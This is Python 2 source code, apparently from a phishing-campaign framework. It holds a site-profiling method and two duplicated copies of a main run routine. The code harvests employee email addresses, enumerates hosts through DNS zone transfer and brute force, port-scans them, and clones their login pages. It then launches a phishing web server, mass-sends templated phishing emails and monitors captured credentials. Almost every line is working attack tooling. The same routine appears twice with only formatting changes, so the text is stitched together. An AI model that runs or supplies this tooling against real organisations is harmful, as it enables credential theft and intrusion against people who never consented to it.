def profile_site(self): # are required flags set? if (self.config["profile_domain"] == True): self.display.output("Determining if any of the identified hosts have web servers.") # for hosts in the port 80 list for host in self.server_list[80]: # create a profiler object p = profiler() # run it against the website profile_results = p.run("http://" + host, debug=False) # if we got valid results, look to see if we have a match for one of the templates if (profile_results and (len(profile_results) > 0)): max_key = "" max_value = 0 for key, value in profile_results: if (value.getscore() > max_value): max_key = key max_value = value.getscore() if (max_value > 0): self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key)) self.profile_valid_web_templates.append(max_key) else: # other wise we will see about adding it to a list of sites to clone if (p.hasLogin("http://" + host)): self.profile_dynamic_web_templates.append("http://" + host) # repeat same as for port 80 for host in self.server_list[443]: p = profiler() profile_results = p.run("https://" + host, debug=False) if (profile_results and (len(profile_results) > 0)): max_key = "" max_value = 0 for key, value in profile_results: if (value.getscore() > max_value): max_key = key max_value = value.getscore() if (max_value > 0): self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key)) self.profile_valid_web_templates.append(max_key) else: if (p.hasLogin("https://" + host)): self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host)) self.profile_dynamic_web_templates.append("https://" + host) # sort/unique list of valid templates self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates) self.profile_valid_web_templates.sort() # print list of valid templatess self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates))) self.display.print_list("VALID TEMPLATE LIST",self.profile_valid_web_templates) # sort/unique list of dynamic templates self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates) self.profile_dynamic_web_templates.sort() # print list of valid templatess self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates))) self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates) # sort/unique hostname list self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates) self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates) self.profile_dynamic_web_templates.sort() # for any dynamic sites, try to clone them self.display.output("Cloning any DYNAMIC sites") for template in self.profile_dynamic_web_templates: sc = SiteCloner(clone_dir=self.outdir+"web_clones/") tdir = sc.cloneUrl(template) self.display.verbose("Cloning [%s] to [%s]" % (template, tdir)) self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir) # loop over all built in templates for f in os.listdir(self.config["web_template_path"]): template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG" for line in open(template_file).readlines(): for tem in self.profile_valid_web_templates: if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE): self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f)) break
def run(self, argv): # ================================================== # Process/Load commanline args and config file # ================================================== self.parse_parameters(argv) # load the config file if self.config["config_filename"] is not None: temp1 = self.config temp2 = Utils.load_config(self.config["config_filename"]) self.config = dict(temp2.items() + temp1.items()) else: if Utils.is_readable("default.cfg"): self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]") print temp1 = self.config temp2 = Utils.load_config("default.cfg") self.config = dict(temp2.items() + temp1.items()) else: self.display.error("a CONFIG FILE was not specified...") print sys.exit() # set verbosity level if self.config["verbose"] >= 1: self.display.enableVerbose() if self.config["verbose"] > 1: self.display.enableDebug() # set logging path self.logpath = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/" if not os.path.exists(os.path.dirname(self.logpath)): os.makedirs(os.path.dirname(self.logpath)) self.display.setLogPath(self.logpath) # print self.logpath self.db = MyDB(sqlite_file=self.logpath) self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt") self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt") self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt") # ================================================== # Load/Gather target email addresses # ================================================== if (self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True): print self.display.output("Obtaining list of email targets") if self.config["always_yes"] or self.display.yn("Continue", default="y"): # if an external emaillist file was specified, read it in if self.config["email_list_filename"] is not None: file = open(self.config["email_list_filename"], "r") temp_list = file.read().splitlines() self.display.verbose( "Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]) ) self.email_list += temp_list # gather email addresses if self.config["gather_emails"] == True: if self.config["domain_name"] == "": self.display.error("No target domain specified. Can not gather email addresses.") else: self.display.verbose("Gathering emails via built-in methods") self.display.verbose(Gather.get_sources()) if not self.gather: self.gather = Gather(self.config["domain_name"], display=self.display) temp_list = self.gather.emails() self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list))) self.email_list += temp_list print # gather email addresses from external sources if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True): # theHarvester self.display.verbose("Gathering emails via theHarvester") thr = theHarvester( self.config["domain_name"], self.config["theharvester_path"], display=self.display ) out = thr.run() if not out: temp_list = thr.emails() self.display.verbose( "Gathered [%s] email addresses from theHarvester" % (len(temp_list)) ) self.email_list += temp_list else: self.display.error(out) print # # Recon-NG # self.display.verbose("Gathering emails via Recon-NG") # temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather() # self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list))) # self.email_list += temp_list # sort/unique email list self.email_list = Utils.unique_list(self.email_list) self.email_list.sort() self.db.addUsers(self.email_list) # print list of email addresses self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list))) self.display.print_list("EMAIL LIST", self.email_list) for email in self.email_list: self.display.log(email + "\n", filename="email_targets.txt") # ================================================== # Gather dns hosts # ================================================== if self.config["gather_dns"] == True: print self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"])) self.display.verbose("Gathering hosts via built-in methods") # Gather hosts from internet search self.display.verbose(Gather.get_sources()) if not self.gather: self.gather = Gather(self.config["domain_name"], display=self.display) temp_list = self.gather.hosts() self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list))) self.hostname_list += temp_list # Gather hosts from DNS lookups temp_list = Dns.xfr(self.config["domain_name"]) self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list))) self.hostname_list += temp_list temp_list = Dns.ns(self.config["domain_name"]) temp_list = Utils.filterList(temp_list, self.config["domain_name"]) self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list))) self.hostname_list += temp_list temp_list = Dns.mx(self.config["domain_name"]) temp_list = Utils.filterList(temp_list, self.config["domain_name"]) self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list))) self.hostname_list += temp_list # Gather hosts from dictionary lookup temp_list = Dns.brute(self.config["domain_name"], display=self.display) self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list))) self.hostname_list += temp_list # sort/unique hostname list self.hostname_list = Utils.unique_list(self.hostname_list) self.hostname_list.sort() self.db.addHosts(self.hostname_list) # print list of hostnames self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list))) self.display.print_list("HOST LIST", self.hostname_list) # ================================================== # Perform Port Scans # ================================================== if self.config["gather_dns"] == True: self.display.output("Performing basic port scans of any identified hosts.") self.server_list[80] = [] self.server_list[443] = [] self.server_list[110] = [] self.server_list[995] = [] self.server_list[143] = [] self.server_list[993] = [] self.server_list[25] = [] for host in self.hostname_list: openports = portscan.scan(host, [25, 80, 110, 143, 443, 993, 995]) found = False for port in openports: self.db.addPort(port, host) if port == 80: self.display.verbose("Found website at: %s 80" % (host)) self.server_list[80].append(host) found = True elif port == 443: self.display.verbose("Found website at: %s 443" % (host)) self.server_list[443].append(host) found = True elif port == 110: self.display.verbose("Found POP at : %s 110" % (host)) self.server_list[110].append(host) found = True elif port == 995: self.display.verbose("Found POPS at : %s 995" % (host)) self.server_list[995].append(host) found = True elif port == 143: self.display.verbose("Found IMAP at : %s 143" % (host)) self.server_list[143].append(host) found = True elif port == 993: self.display.verbose("Found IMAPS at : %s 993" % (host)) self.server_list[993].append(host) found = True elif port == 25: self.display.verbose("Found SMTP at : %s 25" % (host)) self.server_list[25].append(host) found = True if found: self.display.log(host + "\n", filename="hosts.txt") # ================================================== # Profile Web Sites # ================================================== if self.config["profile_domain"] == True: self.display.output("Determining if any of the identified hosts have web servers.") for host in self.server_list[80]: p = profiler() profile_results = p.run("http://" + host, debug=False) if profile_results and (len(profile_results) > 0): max_key = "" max_value = 0 for key, value in profile_results: if value.getscore() > max_value: max_key = key max_value = value.getscore() if max_value > 0: self.display.verbose("POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key)) self.profile_valid_web_templates.append(max_key) else: if p.hasLogin("http://" + host): self.profile_dynamic_web_templates.append("http://" + host) for host in self.server_list[443]: p = profiler() profile_results = p.run("https://" + host, debug=False) if profile_results and (len(profile_results) > 0): max_key = "" max_value = 0 for key, value in profile_results: if value.getscore() > max_value: max_key = key max_value = value.getscore() if max_value > 0: self.display.verbose("POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key)) self.profile_valid_web_templates.append(max_key) else: if p.hasLogin("https://" + host): self.display.verbose("POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host)) self.profile_dynamic_web_templates.append("https://" + host) self.profile_valid_web_templates = Utils.unique_list(self.profile_valid_web_templates) self.profile_valid_web_templates.sort() # print list of valid templatess self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates))) self.display.print_list("VALID TEMPLATE LIST", self.profile_valid_web_templates) self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates) self.profile_dynamic_web_templates.sort() # print list of valid templatess self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates))) self.display.print_list("DYNAMIC TEMPLATE LIST", self.profile_dynamic_web_templates) self.display.output("Cloning any DYNAMIC sites") for template in self.profile_dynamic_web_templates: sc = SiteCloner(clone_dir=self.logpath) tdir = sc.cloneUrl(template) self.display.verbose("Cloning [%s] to [%s]" % (template, tdir)) self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir) for f in os.listdir(self.config["web_template_path"]): template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG" # self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f)) for line in open(template_file).readlines(): for tem in self.profile_valid_web_templates: if re.match("^VHOST=\s*" + tem + "\s*$", line, re.IGNORECASE): self.db.addWebTemplate( ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f) ) break # ================================================== # Load web sites # ================================================== if self.config["enable_web"] == True: print self.display.output("Starting phishing webserver") if self.config["always_yes"] or self.display.yn("Continue", default="y"): path = os.path.dirname(os.path.realpath(__file__)) # Start process cmd = [path + "/../web.py", Utils.compressDict(self.config)] self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE) # monitor output to gather website information while True: line = self.webserver.stdout.readline() line = line.strip() if line == "Websites loaded and launched.": break if line != "": self.display.verbose(line) match = re.search("Started website", line) VHOST = "" PORT = "" if match: parts = line.split("[") VHOST = parts[1].split("]") VHOST = VHOST[0].strip() PORT = parts[2].split("]") PORT = PORT[0].strip() PORT = PORT[7:] # keep the URL clean # if port is 80, then it does not need to be included in the URL if PORT[-3:] == ":80": PORT = PORT[:-3] self.config[VHOST + "_port"] = PORT self.config[VHOST + "_vhost"] = VHOST Utils.screenCaptureWebSite("http://" + PORT, self.logpath + PORT + "_" + VHOST + ".png") Utils.screenCaptureWebSite( "http://" + VHOST + "." + self.config["phishing_domain"], self.logpath + VHOST + "." + self.config["phishing_domain"] + ".png", ) # Write PID file pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid") pidfile = open(pidfilename, "w") pidfile.write(str(self.webserver.pid)) pidfile.close() self.webserverpid = self.webserver.pid self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid) # ================================================== # Build array of email templates # ================================================== if ((self.email_list is not None) and (self.email_list)) and ( (self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True) ): print self.display.verbose("Locating phishing email templates") if self.config["always_yes"] or self.display.yn("Continue", default="y"): # loop over each email template for f in os.listdir("templates/email/"): template_file = os.path.join("templates/email/", f) self.display.debug("Found the following email template: [%s]" % template_file) if (Utils.is_readable(template_file)) and (os.path.isfile(template_file)): # read in the template SUBJECT, TYPE, and BODY TYPE = "" SUBJECT = "" BODY = "" with open(template_file, "r") as myfile: for line in myfile.readlines(): match = re.search("TYPE=", line) if match: TYPE = line.replace('"', "") TYPE = TYPE.split("=") TYPE = TYPE[1].lower().strip() match2 = re.search("SUBJECT=", line) if match2: SUBJECT = line.replace('"', "") SUBJECT = SUBJECT.split("=") SUBJECT = SUBJECT[1].strip() match3 = re.search("BODY=", line) if match3: BODY = line.replace('"', "") BODY = BODY.replace(r"\n", "\n") BODY = BODY.split("=") BODY = BODY[1].strip() self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY)) # ================================================== # Generate/Send phishing emails # ================================================== if (self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True): if (self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1"): self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.") else: print self.display.output("Sending phishing emails") if self.config["always_yes"] or self.display.yn("Continue", default="y"): templates_logged = [] # do we have any emails top send? if self.email_list: temp_target_list = self.email_list temp_delay = 1 if self.config["email_delay"] is not None: temp_delay = int(self.config["email_delay"]) send_count = 0 # while there are still target email address, loop while temp_target_list and (send_count < (int(self.config["emails_max"]))): # inc number of emails we have attempted to send send_count = send_count + 1 # delay requested amount of time between sending emails time.sleep(temp_delay) # for each type of email (citrix, owa, office365, ...) for key in self.email_templates: # double check if temp_target_list: # for each email template of the given type for template in self.email_templates[key]: # double check if temp_target_list: # grab a new target email address target = temp_target_list.pop(0) self.display.verbose("Sending Email to [%s]" % target) # FROM = "support@" + self.config["phishing_domain"] FROM = self.config["smtp_fromaddr"] SUBJECT = template.getSUBJECT() BODY = template.getBODY() # perform necessary SEARCH/REPLACE if self.config["enable_host_based_vhosts"] == "1": BODY = BODY.replace( r"[[TARGET]]", "http://" + key + "." + self.config["phishing_domain"], ) if self.config["default_web_port"] != "80": BODY += ":" + self.config["default_web_port"] else: BODY = BODY.replace( r"[[TARGET]]", "http://" + self.config[key + "_port"] ) # log if key not in templates_logged: self.display.log( "----------------------------------------------\n\n" + "TO: <XXXXX>\n" + "FROM: " + FROM + "\n" + "SUBJECT: " + SUBJECT + "\n\n" + BODY + "\n\n" + "----------------------------------------------\n\n" + "TARGETS:\n" + "--------\n", filename="email_template_" + key + ".txt", ) templates_logged.append(key) self.display.log(target + "\n", filename="email_template_" + key + ".txt") # send the email if self.config["simulate_email_sending"] == True: self.display.output( "Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT) ) else: try: if self.config["determine_smtp"] == "1": emails.send_email_direct( target, FROM, SUBJECT, BODY, debug=True ) if self.config["use_specific_smtp"] == "1": # self.display.error("[USE_SPECIFIC_SMTP] not implemented") print self.config["smtp_fromaddr"] emails.send_email_account( self.config["smtp_server"], int(self.config["smtp_port"]), self.config["smtp_user"], self.config["smtp_pass"], target, self.config["smtp_fromaddr"], SUBJECT, BODY, debug=True, ) except: self.display.error(sys.exc_info()[0]) # ================================================== # Monitor web sites # ================================================== if self.config["enable_web"] == True: print self.display.output("Monitoring phishing website activity!") self.display.alert("(Press CTRL-C to stop collection and generate report!)") if self.webserver: while True: line = self.webserver.stdout.readline() line = line.strip() if self.config["pillage_email"]: self.pillage(line) self.display.output(line)
def run(self, argv): #================================================== # Process/Load commanline args and config file #================================================== self.parse_parameters(argv) # load the config file if (self.config["config_filename"] is not None): temp1 = self.config temp2 = Utils.load_config(self.config["config_filename"]) self.config = dict(temp2.items() + temp1.items()) else: if Utils.is_readable("default.cfg"): self.display.error( "a CONFIG FILE was not specified... defaulting to [default.cfg]" ) print temp1 = self.config temp2 = Utils.load_config("default.cfg") self.config = dict(temp2.items() + temp1.items()) else: self.display.error("a CONFIG FILE was not specified...") print sys.exit() # set verbosity level if (self.config['verbose'] >= 1): self.display.enableVerbose() if (self.config['verbose'] > 1): self.display.enableDebug() # set logging path self.logpath = os.getcwd() + "/" + self.config[ "domain_name"] + "_" + self.config["phishing_domain"] + "/" if not os.path.exists(os.path.dirname(self.logpath)): os.makedirs(os.path.dirname(self.logpath)) self.display.setLogPath(self.logpath) #print self.logpath self.db = MyDB(sqlite_file=self.logpath) self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt") self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt") self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt") #================================================== # Load/Gather target email addresses #================================================== if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)): print self.display.output("Obtaining list of email targets") if (self.config["always_yes"] or self.display.yn("Continue", default="y")): # if an external emaillist file was specified, read it in if self.config["email_list_filename"] is not None: file = open(self.config["email_list_filename"], 'r') temp_list = file.read().splitlines() self.display.verbose( "Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"])) self.email_list += temp_list # gather email addresses if self.config["gather_emails"] == True: if (self.config["domain_name"] == ""): self.display.error( "No target domain specified. Can not gather email addresses." ) else: self.display.verbose( "Gathering emails via built-in methods") self.display.verbose(Gather.get_sources()) if (not self.gather): self.gather = Gather(self.config["domain_name"], display=self.display) temp_list = self.gather.emails() self.display.verbose( "Gathered [%s] email addresses from the Internet" % (len(temp_list))) self.email_list += temp_list print # gather email addresses from external sources if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True): # theHarvester self.display.verbose( "Gathering emails via theHarvester") thr = theHarvester( self.config["domain_name"], self.config["theharvester_path"], display=self.display) out = thr.run() if (not out): temp_list = thr.emails() self.display.verbose( "Gathered [%s] email addresses from theHarvester" % (len(temp_list))) self.email_list += temp_list else: self.display.error(out) print # # Recon-NG # self.display.verbose("Gathering emails via Recon-NG") # temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather() # self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list))) # self.email_list += temp_list # sort/unique email list self.email_list = Utils.unique_list(self.email_list) self.email_list.sort() self.db.addUsers(self.email_list) # print list of email addresses self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list))) self.display.print_list("EMAIL LIST", self.email_list) for email in self.email_list: self.display.log(email + "\n", filename="email_targets.txt") #================================================== # Gather dns hosts #================================================== if (self.config["gather_dns"] == True): print self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"])) self.display.verbose("Gathering hosts via built-in methods") # Gather hosts from internet search self.display.verbose(Gather.get_sources()) if (not self.gather): self.gather = Gather(self.config["domain_name"], display=self.display) temp_list = self.gather.hosts() self.display.verbose( "Gathered [%s] hosts from the Internet Search" % (len(temp_list))) self.hostname_list += temp_list # Gather hosts from DNS lookups temp_list = Dns.xfr(self.config["domain_name"]) self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list))) self.hostname_list += temp_list temp_list = Dns.ns(self.config["domain_name"]) temp_list = Utils.filterList(temp_list, self.config["domain_name"]) self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list))) self.hostname_list += temp_list temp_list = Dns.mx(self.config["domain_name"]) temp_list = Utils.filterList(temp_list, self.config["domain_name"]) self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list))) self.hostname_list += temp_list # Gather hosts from dictionary lookup temp_list = Dns.brute(self.config["domain_name"], display=self.display) self.display.verbose( "Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list))) self.hostname_list += temp_list # sort/unique hostname list self.hostname_list = Utils.unique_list(self.hostname_list) self.hostname_list.sort() self.db.addHosts(self.hostname_list) # print list of hostnames self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list))) self.display.print_list("HOST LIST", self.hostname_list) #================================================== # Perform Port Scans #================================================== if (self.config["gather_dns"] == True): self.display.output( "Performing basic port scans of any identified hosts.") self.server_list[80] = [] self.server_list[443] = [] self.server_list[110] = [] self.server_list[995] = [] self.server_list[143] = [] self.server_list[993] = [] self.server_list[25] = [] for host in self.hostname_list: openports = portscan.scan(host, [25, 80, 110, 143, 443, 993, 995]) found = False for port in openports: self.db.addPort(port, host) if (port == 80): self.display.verbose("Found website at: %s 80" % (host)) self.server_list[80].append(host) found = True elif (port == 443): self.display.verbose("Found website at: %s 443" % (host)) self.server_list[443].append(host) found = True elif (port == 110): self.display.verbose("Found POP at : %s 110" % (host)) self.server_list[110].append(host) found = True elif (port == 995): self.display.verbose("Found POPS at : %s 995" % (host)) self.server_list[995].append(host) found = True elif (port == 143): self.display.verbose("Found IMAP at : %s 143" % (host)) self.server_list[143].append(host) found = True elif (port == 993): self.display.verbose("Found IMAPS at : %s 993" % (host)) self.server_list[993].append(host) found = True elif (port == 25): self.display.verbose("Found SMTP at : %s 25" % (host)) self.server_list[25].append(host) found = True if (found): self.display.log(host + "\n", filename="hosts.txt") #================================================== # Profile Web Sites #================================================== if (self.config["profile_domain"] == True): self.display.output( "Determining if any of the identified hosts have web servers.") for host in self.server_list[80]: p = profiler() profile_results = p.run("http://" + host, debug=False) if (profile_results and (len(profile_results) > 0)): max_key = "" max_value = 0 for key, value in profile_results: if (value.getscore() > max_value): max_key = key max_value = value.getscore() if (max_value > 0): self.display.verbose( "POSSIBLE MATCH FOR [http://%s] => [%s]" % (host, max_key)) self.profile_valid_web_templates.append(max_key) else: if (p.hasLogin("http://" + host)): self.profile_dynamic_web_templates.append("http://" + host) for host in self.server_list[443]: p = profiler() profile_results = p.run("https://" + host, debug=False) if (profile_results and (len(profile_results) > 0)): max_key = "" max_value = 0 for key, value in profile_results: if (value.getscore() > max_value): max_key = key max_value = value.getscore() if (max_value > 0): self.display.verbose( "POSSIBLE MATCH FOR [https://%s] => [%s]" % (host, max_key)) self.profile_valid_web_templates.append(max_key) else: if (p.hasLogin("https://" + host)): self.display.verbose( "POSSIBLE DYNAMIC TEMPLATE SITE [https://%s]" % (host)) self.profile_dynamic_web_templates.append("https://" + host) self.profile_valid_web_templates = Utils.unique_list( self.profile_valid_web_templates) self.profile_valid_web_templates.sort() # print list of valid templatess self.display.verbose("Collected [%s] valid web templates" % (len(self.profile_valid_web_templates))) self.display.print_list("VALID TEMPLATE LIST", self.profile_valid_web_templates) self.profile_dynamic_web_templates = Utils.unique_list( self.profile_dynamic_web_templates) self.profile_dynamic_web_templates.sort() # print list of valid templatess self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates))) self.display.print_list("DYNAMIC TEMPLATE LIST", self.profile_dynamic_web_templates) self.display.output("Cloning any DYNAMIC sites") for template in self.profile_dynamic_web_templates: sc = SiteCloner(clone_dir=self.logpath) tdir = sc.cloneUrl(template) self.display.verbose("Cloning [%s] to [%s]" % (template, tdir)) self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir) for f in os.listdir(self.config["web_template_path"]): template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG" # self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f)) for line in open(template_file).readlines(): for tem in self.profile_valid_web_templates: if re.match("^VHOST=\s*" + tem + "\s*$", line, re.IGNORECASE): self.db.addWebTemplate( ttype="static", src_url="", tdir=os.path.join( self.config["web_template_path"], f)) break #================================================== # Load web sites #================================================== if self.config["enable_web"] == True: print self.display.output("Starting phishing webserver") if (self.config["always_yes"] or self.display.yn("Continue", default="y")): path = os.path.dirname(os.path.realpath(__file__)) # Start process cmd = [path + "/../web.py", Utils.compressDict(self.config)] self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE) # monitor output to gather website information while True: line = self.webserver.stdout.readline() line = line.strip() if line == 'Websites loaded and launched.': break if line != '': self.display.verbose(line) match = re.search("Started website", line) VHOST = "" PORT = "" if match: parts = line.split("[") VHOST = parts[1].split("]") VHOST = VHOST[0].strip() PORT = parts[2].split("]") PORT = PORT[0].strip() PORT = PORT[7:] # keep the URL clean # if port is 80, then it does not need to be included in the URL if (PORT[-3:] == ":80"): PORT = PORT[:-3] self.config[VHOST + "_port"] = PORT self.config[VHOST + "_vhost"] = VHOST Utils.screenCaptureWebSite( "http://" + PORT, self.logpath + PORT + "_" + VHOST + ".png") Utils.screenCaptureWebSite( "http://" + VHOST + "." + self.config["phishing_domain"], self.logpath + VHOST + "." + self.config["phishing_domain"] + ".png") # Write PID file pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid") pidfile = open(pidfilename, 'w') pidfile.write(str(self.webserver.pid)) pidfile.close() self.webserverpid = self.webserver.pid self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid) #================================================== # Build array of email templates #================================================== if (((self.email_list is not None) and (self.email_list)) and ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True))): print self.display.verbose("Locating phishing email templates") if (self.config["always_yes"] or self.display.yn("Continue", default="y")): # loop over each email template for f in os.listdir("templates/email/"): template_file = os.path.join("templates/email/", f) self.display.debug( "Found the following email template: [%s]" % template_file) if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))): # read in the template SUBJECT, TYPE, and BODY TYPE = "" SUBJECT = "" BODY = "" with open(template_file, "r") as myfile: for line in myfile.readlines(): match = re.search("TYPE=", line) if match: TYPE = line.replace('"', "") TYPE = TYPE.split("=") TYPE = TYPE[1].lower().strip() match2 = re.search("SUBJECT=", line) if match2: SUBJECT = line.replace('"', "") SUBJECT = SUBJECT.split("=") SUBJECT = SUBJECT[1].strip() match3 = re.search("BODY=", line) if match3: BODY = line.replace('"', "") BODY = BODY.replace(r'\n', "\n") BODY = BODY.split("=") BODY = BODY[1].strip() self.email_templates[TYPE].append( EmailTemplate(TYPE, SUBJECT, BODY)) #================================================== # Generate/Send phishing emails #================================================== if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)): if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")): self.display.error( "ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time." ) else: print self.display.output("Sending phishing emails") if (self.config["always_yes"] or self.display.yn("Continue", default="y")): templates_logged = [] #do we have any emails top send? if self.email_list: temp_target_list = self.email_list temp_delay = 1 if (self.config["email_delay"] is not None): temp_delay = int(self.config["email_delay"]) send_count = 0 # while there are still target email address, loop while (temp_target_list and (send_count < (int(self.config["emails_max"])))): # inc number of emails we have attempted to send send_count = send_count + 1 # delay requested amount of time between sending emails time.sleep(temp_delay) # for each type of email (citrix, owa, office365, ...) for key in self.email_templates: # double check if temp_target_list: # for each email template of the given type for template in self.email_templates[key]: # double check if temp_target_list: # grab a new target email address target = temp_target_list.pop(0) self.display.verbose( "Sending Email to [%s]" % target) #FROM = "support@" + self.config["phishing_domain"] FROM = self.config["smtp_fromaddr"] SUBJECT = template.getSUBJECT() BODY = template.getBODY() # perform necessary SEARCH/REPLACE if self.config[ "enable_host_based_vhosts"] == "1": BODY = BODY.replace( r'[[TARGET]]', "http://" + key + "." + self. config["phishing_domain"]) if self.config[ "default_web_port"] != "80": BODY += ":" + self.config[ "default_web_port"] else: BODY = BODY.replace( r'[[TARGET]]', "http://" + self.config[key + "_port"]) # log if (key not in templates_logged): self.display.log( "----------------------------------------------\n\n" + "TO: <XXXXX>\n" + "FROM: " + FROM + "\n" + "SUBJECT: " + SUBJECT + "\n\n" + BODY + "\n\n" + "----------------------------------------------\n\n" + "TARGETS:\n" + "--------\n", filename="email_template_" + key + ".txt") templates_logged.append(key) self.display.log( target + "\n", filename="email_template_" + key + ".txt") # send the email if (self.config[ "simulate_email_sending"] == True): self.display.output( "Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT)) else: try: if self.config[ "determine_smtp"] == "1": emails.send_email_direct( target, FROM, SUBJECT, BODY, debug=True) if self.config[ "use_specific_smtp"] == "1": #self.display.error("[USE_SPECIFIC_SMTP] not implemented") print self.config[ "smtp_fromaddr"] emails.send_email_account( self.config[ "smtp_server"], int(self.config[ "smtp_port"]), self.config[ "smtp_user"], self.config[ "smtp_pass"], target, self.config[ "smtp_fromaddr"], SUBJECT, BODY, debug=True) except: self.display.error( sys.exc_info()[0]) #================================================== # Monitor web sites #================================================== if self.config["enable_web"] == True: print self.display.output("Monitoring phishing website activity!") self.display.alert( "(Press CTRL-C to stop collection and generate report!)") if (self.webserver): while True: line = self.webserver.stdout.readline() line = line.strip() if (self.config["pillage_email"]): self.pillage(line) self.display.output(line)